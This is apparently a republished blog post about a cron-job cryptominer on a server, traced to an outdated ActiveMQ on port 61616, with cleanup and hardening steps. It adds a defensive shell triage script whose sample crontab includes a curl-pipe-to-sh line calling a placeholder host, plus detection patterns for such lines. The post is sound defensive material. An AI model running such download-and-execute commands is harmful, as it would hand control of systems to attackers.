How a Hidden Cron Job Hijacked My Server and How I Fixed It
A production server running Tomcat, MySQL, MongoDB and ActiveMQ was taken down by a malicious cron job that executed a cryptomining script, and the article walks through the investigation, removal, and hardening steps to fully recover and secure the system.
Incident Overview
My online server, which hosts Tomcat, MySQL, MongoDB and ActiveMQ, suddenly became inaccessible.
Investigation
After logging in at a brisk 150‑plus keystroke speed, I saw that Tomcat had crashed and that every restart attempt was being killed. Running top revealed an unfamiliar process repeatedly consuming CPU.
Suspecting a scheduled task, I examined the crontab and discovered a hidden entry that kept respawning the process.
The task downloaded and executed a cryptomining script, as shown in the captured script image.
For those interested, the full source can be retrieved with a single command (the exact command is shown in the original blog image).
Remediation Steps
1. Kill the malicious process and remove the crontab entry.
2. Locate the temporary directory (in my case /var/tmp) and delete the malicious files.
3. Restart Tomcat and the other services.
These actions restored service availability, but they only addressed the symptom.
Hardening Measures
To prevent recurrence, I performed the following:
1. Upgrade all software to the latest versions.
2. Change the default ports for all services.
3. Inspect ~/.ssh/authorized_keys and remove unknown keys.
4. Delete unfamiliar user accounts.
5. Block the attacker’s IP address.
6. Configure SSH to use key‑based authentication only and disable password login.
The root cause was a vulnerability in an old version of ActiveMQ exposing port 61616, which allowed the attacker to deploy the mining script.
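As an added example (not code from the original post), a small POSIX shell triage script that automates the checks above: flagging crontab entries that pipe downloaded content into a shell or run from /var/tmp, listing authorized_keys entries whose comment is not on an allow-list, and checking whether a port such as ActiveMQ's 61616 is listening. The crontab, key and socket-listing samples are constructed placeholders so the script runs offline; on a real host you would feed it `crontab -l`, the actual key file and `ss -lnt` output instead.

```shell
#!/bin/sh
# Constructed sample crontab (placeholder URL, not a real indicator): one benign
# entry, one that pipes a downloaded script to sh, one that runs from /var/tmp.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER/x.sh | sh > /dev/null 2>&1
*/10 * * * * /var/tmp/.hidden/run >/dev/null 2>&1'

# Print non-comment crontab lines that either pipe curl/wget output into a
# shell or execute something under /tmp or /var/tmp.
flag_cron_lines() {
    printf '%s\n' "$1" | grep -v '^#' | grep -E \
        -e '(curl|wget)[^|]*\|[[:space:]]*(ba|da)?sh' \
        -e '(^|[[:space:]])/(var/)?tmp/'
}

# Constructed authorized_keys: a known admin key plus one unknown key
# (key material is a placeholder, not a real key).
SAMPLE_AUTH_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyPlaceholder admin@ops
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCUnknownKeyPlaceholder nobody@nowhere'
KNOWN_KEY_COMMENTS='admin@ops'

# Print key lines whose trailing comment is not in the comma-separated allow-list.
unknown_keys() {
    printf '%s\n' "$1" | awk -v known="$2" '
        BEGIN { n = split(known, k, ","); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
        NF >= 3 && !($NF in ok) { print }'
}

# Constructed `ss -lnt`-style output; ActiveMQ OpenWire listens on 61616 by default.
SAMPLE_LISTEN='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 100 0.0.0.0:61616 0.0.0.0:*'

# Echo "exposed" if the given TCP port appears in the listening set, else "closed".
port_exposed() {
    printf '%s\n' "$1" | grep -qE "[:.]$2[[:space:]]" && echo exposed || echo closed
}

# Stand-alone run: show each finding for the constructed samples.
flag_cron_lines "$SAMPLE_CRONTAB"
unknown_keys "$SAMPLE_AUTH_KEYS" "$KNOWN_KEY_COMMENTS"
port_exposed "$SAMPLE_LISTEN" 61616
```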
Final Thoughts
One community‑suggested “ultimate” fix is to replace the attacker’s script with your own mining script, ensuring any future attempts fail, but a proper security patch and system hardening are the recommended solutions.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.